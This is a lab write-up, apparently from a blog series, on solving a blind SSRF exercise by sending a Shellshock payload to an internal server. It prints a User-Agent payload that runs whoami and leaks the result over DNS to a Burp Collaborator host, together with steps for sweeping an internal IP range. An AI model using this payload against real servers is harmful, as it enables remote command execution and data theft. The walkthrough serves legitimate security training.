Blind SSRF with Shell Shock Exploitation


In this article, we are going to solve the Blind SSRF with Shell Shock Exploitation lab. This is our 7th lab or 6th article on server-side request forgery.

Lab Description

This lab contains analytics software that fetches the URL specified in the Referer header whenever a product page is loaded. In order to access the internal server, we need to perform a blind SSRF attack. IP range and port have also been provided to us. We need to execute the shellshock payload against the internal server to fetch the OS user’s name.

Lab Solution

I have already told you in a previous lab how to automate the Burp Collab payload in the Referer. You can read my article for that.

Now you can see that I have visited the lab and intercepted a product. After the interception, I added my new payload in the Referer.

After adding the payload, I confirmed that it is vulnerable to SSRF because I received DNS and HTTP requests.

Next, we will search for the shellshock payload in the user-agent.

After searching, we will copy the payload from any website. I am providing the payload here:

() { :; };

Now we will remove the value of user-agent and set our payload there.

() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN


() { :; }; /usr/bin/nslookup ‘whoami’.BURP-COLLABORATOR-SUBDOMAIN

We will remove the value of Referer and add the internal IP. After doing this, we will send this request to the Intruder.

Now, you can add the value of “x” and select the payload type as numbers. Start the attack from 0 to 255 and go forward one step at a time.

After clicking on start attack, you will receive DNS and HTTP values, including the name of the OS user.

Now you can submit the name of the OS user in the lab called Blind SSRF with Shell Shock Exploitation.

Leave a Comment